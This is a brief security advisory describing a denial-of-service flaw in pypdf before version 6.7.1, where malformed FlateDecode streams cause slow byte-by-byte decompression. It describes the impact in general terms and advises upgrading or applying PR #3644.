pypdf FlateDecode Stream Decompression Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in pypdf, a pure-Python PDF library, affecting versions prior to 6.7.1. The issue arises when an attacker crafts a PDF with a malformed FlateDecode stream, causing the library to use byte-by-byte decompression. This can lead to significantly prolonged processing times.

Impact

Exploitation of this vulnerability causes excessive runtimes when processing PDFs with malformed FlateDecode streams, due to the byte-by-byte decompression method employed.

Reproduction

The vulnerability can be reproduced by creating a PDF file that includes a malformed FlateDecode stream. When this PDF is processed with a version of pypdf prior to 6.7.1, the library will experience extended runtimes as it decompresses the data byte by byte.

Remediation

Users can upgrade to pypdf version 6.7.1 or later to address this vulnerability. If an immediate upgrade is not possible, the changes from PR #3644 can be applied as a temporary workaround.